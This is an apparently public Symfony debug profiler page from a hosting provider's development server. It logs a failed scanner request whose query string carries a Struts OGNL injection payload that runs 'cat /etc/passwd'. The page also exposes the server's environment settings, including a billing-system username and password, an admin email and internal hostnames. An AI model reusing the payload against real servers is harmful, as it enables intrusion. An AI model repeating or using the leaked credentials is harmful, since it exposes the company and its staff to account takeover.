ErrorController

Request

GET Parameters

Key Value
cmd
"cat /etc/passwd"
encoding
"UTF-8"
method:#_memberAccess=@ognl_OgnlContext@DEFAULT_MEMBER_ACCESS,#res=@org_apache_struts2_ServletActionContext@getResponse(),#res_setCharacterEncoding(#parameters_encoding
[
  ""
]
pp
"\\A"
ppp
" "

POST Parameters

No POST parameters

Uploaded Files

No files were uploaded

Request Attributes

Key Value
_controller
"error_controller"
_stopwatch_token
"50072c"
exception
Symfony\Component\HttpKernel\Exception\NotFoundHttpException {#390
  #message: "No route found for "GET https://185.179.196.109/index.action""
  #code: 0
  #file: "/home/developer/website-scripts/vendor/symfony/http-kernel/EventListener/RouterListener.php"
  #line: 149
  -previous: Symfony\Component\Routing\Exception\ResourceNotFoundException {#361 …}
  -statusCode: 404
  -headers: []
  trace: {
    /home/developer/website-scripts/vendor/symfony/http-kernel/EventListener/RouterListener.php:149 {
      Symfony\Component\HttpKernel\EventListener\RouterListener->onKernelRequest(RequestEvent $event): void …
      › 
      ›     throw new NotFoundHttpException($message, $e);} catch (MethodNotAllowedException $e) {
    }
    /home/developer/website-scripts/vendor/symfony/event-dispatcher/Debug/WrappedListener.php:115 {
      Symfony\Component\EventDispatcher\Debug\WrappedListener->__invoke(object $event, string $eventName, EventDispatcherInterface $dispatcher): void …
      › try {    ($this->optimizedListener ?? $this->listener)($event, $eventName, $dispatcher);} finally {
    }
    /home/developer/website-scripts/vendor/symfony/event-dispatcher/EventDispatcher.php:206 {
      Symfony\Component\EventDispatcher\EventDispatcher->callListeners(iterable $listeners, string $eventName, object $event): void …
      ›     }    $listener($event, $eventName, $this);}
    }
    /home/developer/website-scripts/vendor/symfony/event-dispatcher/EventDispatcher.php:56 {
      Symfony\Component\EventDispatcher\EventDispatcher->dispatch(object $event, ?string $eventName = null): object …
      › if ($listeners) {    $this->callListeners($listeners, $eventName, $event);}
    }
    /home/developer/website-scripts/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php:122 {
      Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher->dispatch(object $event, ?string $eventName = null): object …
      › try {    $this->dispatcher->dispatch($event, $eventName);} finally {
    }
    /home/developer/website-scripts/vendor/symfony/http-kernel/HttpKernel.php:159 {
      Symfony\Component\HttpKernel\HttpKernel->handleRaw(Request $request, int $type = self::MAIN_REQUEST): Response …
      › $event = new RequestEvent($this, $request, $type);$this->dispatcher->dispatch($event, KernelEvents::REQUEST);}
    /home/developer/website-scripts/vendor/symfony/http-kernel/HttpKernel.php:76 {
      Symfony\Component\HttpKernel\HttpKernel->handle(Request $request, int $type = HttpKernelInterface::MAIN_REQUEST, bool $catch = true): Response …
      › try {    return $response = $this->handleRaw($request, $type);} catch (\Throwable $e) {
    }
    /home/developer/website-scripts/vendor/symfony/http-kernel/Kernel.php:182 {
      Symfony\Component\HttpKernel\Kernel->handle(Request $request, int $type = HttpKernelInterface::MAIN_REQUEST, bool $catch = true): Response …
      › try {    return $this->getHttpKernel()->handle($request, $type, $catch);} finally {
    }
    /home/developer/website-scripts/vendor/symfony/runtime/Runner/Symfony/HttpKernelRunner.php:35 {
      Symfony\Component\Runtime\Runner\Symfony\HttpKernelRunner->run(): int …
      › {    $response = $this->kernel->handle($this->request);}
    /home/developer/website-scripts/vendor/autoload_runtime.php:29 {
      require_once …
      ›         ->getRunner($app)        ->run());
    }
    /home/developer/website-scripts/public/index.php:7 {
      › 
      › require_once dirname(__DIR__).'/vendor/autoload_runtime.php';arguments: {
        "/home/developer/website-scripts/vendor/autoload_runtime.php"
      }
    }
  }
}
logger
Symfony\Bridge\Monolog\Processor\DebugProcessor {#94
  -records: [
    2 => [
      [
        "timestamp" => 1752815305
        "timestamp_rfc3339" => "2025-07-18T08:08:25.122+03:00"
        "message" => "Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET https://185.179.196.109/index.action"" at RouterListener.php line 149"
        "priority" => 400
        "priorityName" => "ERROR"
        "context" => [
          "exception" => Symfony\Component\HttpKernel\Exception\NotFoundHttpException {#390
            #message: "No route found for "GET https://185.179.196.109/index.action""
            #code: 0
            #file: "/home/developer/website-scripts/vendor/symfony/http-kernel/EventListener/RouterListener.php"
            #line: 149
            -previous: Symfony\Component\Routing\Exception\ResourceNotFoundException {#361 …}
            -statusCode: 404
            -headers: []
            trace: {
              /home/developer/website-scripts/vendor/symfony/http-kernel/EventListener/RouterListener.php:149 {
                Symfony\Component\HttpKernel\EventListener\RouterListener->onKernelRequest(RequestEvent $event): void …
                › 
                ›     throw new NotFoundHttpException($message, $e);} catch (MethodNotAllowedException $e) {
              }
              /home/developer/website-scripts/vendor/symfony/event-dispatcher/Debug/WrappedListener.php:115 {
                Symfony\Component\EventDispatcher\Debug\WrappedListener->__invoke(object $event, string $eventName, EventDispatcherInterface $dispatcher): void …
                › try {    ($this->optimizedListener ?? $this->listener)($event, $eventName, $dispatcher);} finally {
              }
              /home/developer/website-scripts/vendor/symfony/event-dispatcher/EventDispatcher.php:206 {
                Symfony\Component\EventDispatcher\EventDispatcher->callListeners(iterable $listeners, string $eventName, object $event): void …
                ›     }    $listener($event, $eventName, $this);}
              }
              /home/developer/website-scripts/vendor/symfony/event-dispatcher/EventDispatcher.php:56 {
                Symfony\Component\EventDispatcher\EventDispatcher->dispatch(object $event, ?string $eventName = null): object …
                › if ($listeners) {    $this->callListeners($listeners, $eventName, $event);}
              }
              /home/developer/website-scripts/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php:122 {
                Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher->dispatch(object $event, ?string $eventName = null): object …
                › try {    $this->dispatcher->dispatch($event, $eventName);} finally {
              }
              /home/developer/website-scripts/vendor/symfony/http-kernel/HttpKernel.php:159 {
                Symfony\Component\HttpKernel\HttpKernel->handleRaw(Request $request, int $type = self::MAIN_REQUEST): Response …
                › $event = new RequestEvent($this, $request, $type);$this->dispatcher->dispatch($event, KernelEvents::REQUEST);}
              /home/developer/website-scripts/vendor/symfony/http-kernel/HttpKernel.php:76 {
                Symfony\Component\HttpKernel\HttpKernel->handle(Request $request, int $type = HttpKernelInterface::MAIN_REQUEST, bool $catch = true): Response …
                › try {    return $response = $this->handleRaw($request, $type);} catch (\Throwable $e) {
              }
              /home/developer/website-scripts/vendor/symfony/http-kernel/Kernel.php:182 {
                Symfony\Component\HttpKernel\Kernel->handle(Request $request, int $type = HttpKernelInterface::MAIN_REQUEST, bool $catch = true): Response …
                › try {    return $this->getHttpKernel()->handle($request, $type, $catch);} finally {
              }
              /home/developer/website-scripts/vendor/symfony/runtime/Runner/Symfony/HttpKernelRunner.php:35 {
                Symfony\Component\Runtime\Runner\Symfony\HttpKernelRunner->run(): int …
                › {    $response = $this->kernel->handle($this->request);}
              /home/developer/website-scripts/vendor/autoload_runtime.php:29 {
                require_once …
                ›         ->getRunner($app)        ->run());
              }
              /home/developer/website-scripts/public/index.php:7 {
                › 
                › require_once dirname(__DIR__).'/vendor/autoload_runtime.php';arguments: {
                  "/home/developer/website-scripts/vendor/autoload_runtime.php"
                }
              }
            }
          }
        ]
        "channel" => "request"
      ]
    ]
  ]
  -errorCount: [
    2 => 1
  ]
  -requestStack: Symfony\Component\HttpKernel\Debug\VirtualRequestStack {#93 …}
}

Request Headers

Header Value
accept-encoding
"gzip"
connection
"close"
host
"185.179.196.109"
user-agent
"Mozilla/5.0 (Debian; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0"
x-php-ob-level
"1"

Request Content

Request content not available (it was retrieved as a resource).

Response

Response Headers

Header Value
cache-control
"no-cache, private"
content-type
"text/html; charset=UTF-8"
date
"Fri, 18 Jul 2025 05:08:25 GMT"
vary
"Accept"
x-debug-exception
"No%20route%20found%20for%20%22GET%20https%3A%2F%2F185.179.196.109%2Findex.action%22"
x-debug-exception-file
"%2Fhome%2Fdeveloper%2Fwebsite-scripts%2Fvendor%2Fsymfony%2Fhttp-kernel%2FEventListener%2FRouterListener.php:149"
x-debug-token
"f76a6c"

Cookies

Request Cookies

No request cookies

Response Cookies

No response cookies

Session

Session Metadata

No session metadata

Session Attributes

No session attributes

Session Usage

0 Usages
Stateless check enabled

Session not used.

Flashes

Flashes

No flash messages were created.

Server Parameters

Server Parameters

Defined in .env

Key Value
ADMIN_EMAIL
"georgiy.pavlenko@cdnnow.ru"
APP_ENV
"dev"
APP_SECRET
"change_me"
BILLMGR_CHANGE_PASSWORD_URL
"https://my.cdnnow.ru/billmgr"
BILLMGR_DOMAIN_FOR_COOKIE
".dev.gs2seek4dp.net"
BILLMGR_NAME_FOR_COOKIE_ID
"billmgrses5"
BILLMGR_NAME_FOR_COOKIE_LANG
"billmgrlang5"
BILLMGR_PASSWORD
"rX7uM0aB3v"
BILLMGR_PROVIDER_ELID
"3"
BILLMGR_PROVIDER_NAME
"PRE"
BILLMGR_URL
"https://bill.dev.cdnnow.ru"
BILLMGR_USERNAME
"dev.cdnnow"
CDNNOW_OUTPUT_HTML_PATH
"var/web.dev.cdnnow.net/"
EMAIL_FROM
"developer@gp.dev.cdnnow.net"
HOSTING_TARIFF_SORT_FIELD
"disk"
MAILER_DSN
"native://default"
MONOLOG_IDENT
"website-scripts"
MONOLOG_LEVEL
"error"
PATH_TO_EMAIL_TWIG_TEMPLATES
"email/"
PHYSICAL_SERVER_TARIFF_SORT_FIELD
"memory"
TRUSTED_PROXIES
"127.0.0.0"
VPS_TARIFF_PRIMARY_SORT_FIELD
"memory"

Defined as regular env variables

Key Value
APP_DEBUG
"1"
CONTENT_LENGTH
""
CONTENT_TYPE
""
DOCUMENT_ROOT
"/home/developer/website-scripts/public"
DOCUMENT_URI
"/index.action"
FCGI_ROLE
"RESPONDER"
GATEWAY_INTERFACE
"CGI/1.1"
HOME
"/home/developer"
HTTPS
"on"
HTTP_ACCEPT_ENCODING
"gzip"
HTTP_CONNECTION
"close"
HTTP_HOST
"185.179.196.109"
HTTP_USER_AGENT
"Mozilla/5.0 (Debian; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0"
NGINX_REQUEST_ID
"c56a9cb1f9e6da3589908a68b1f264fa"
PATH_INFO
""
PHP_SELF
"/index.php"
QUERY_STRING
"method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd"
REDIRECT_STATUS
"200"
REMOTE_ADDR
"128.90.101.7"
REMOTE_PORT
"57524"
REQUEST_METHOD
"GET"
REQUEST_SCHEME
"https"
REQUEST_TIME
1752815305
REQUEST_TIME_FLOAT
1752815305.108
REQUEST_URI
"/index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd"
SCRIPT_FILENAME
"/home/developer/website-scripts/public/index.php"
SCRIPT_NAME
"/index.php"
SERVER_ADDR
"185.179.196.109"
SERVER_NAME
"ip.gp.dev.cdnnow.net"
SERVER_PORT
"443"
SERVER_PROTOCOL
"HTTP/1.1"
SERVER_SOFTWARE
"nginx/1.28.0"
SYMFONY_DOTENV_PATH
"/home/developer/website-scripts/.env"
SYMFONY_DOTENV_VARS
"APP_ENV,APP_SECRET,MAILER_DSN,MONOLOG_LEVEL,MONOLOG_IDENT,ADMIN_EMAIL,EMAIL_FROM,BILLMGR_URL,BILLMGR_CHANGE_PASSWORD_URL,BILLMGR_DOMAIN_FOR_COOKIE,BILLMGR_NAME_FOR_COOKIE_ID,BILLMGR_NAME_FOR_COOKIE_LANG,BILLMGR_USERNAME,BILLMGR_PASSWORD,BILLMGR_PROVIDER_NAME,BILLMGR_PROVIDER_ELID,VPS_TARIFF_PRIMARY_SORT_FIELD,HOSTING_TARIFF_SORT_FIELD,CDNNOW_OUTPUT_HTML_PATH,PATH_TO_EMAIL_TWIG_TEMPLATES,TRUSTED_PROXIES,PHYSICAL_SERVER_TARIFF_SORT_FIELD"
USER
"developer"

Parent Request

Return to parent request (token = 4c7e3e)

Key Value
_remove_csp_headers
true
_stopwatch_token
"48cca7"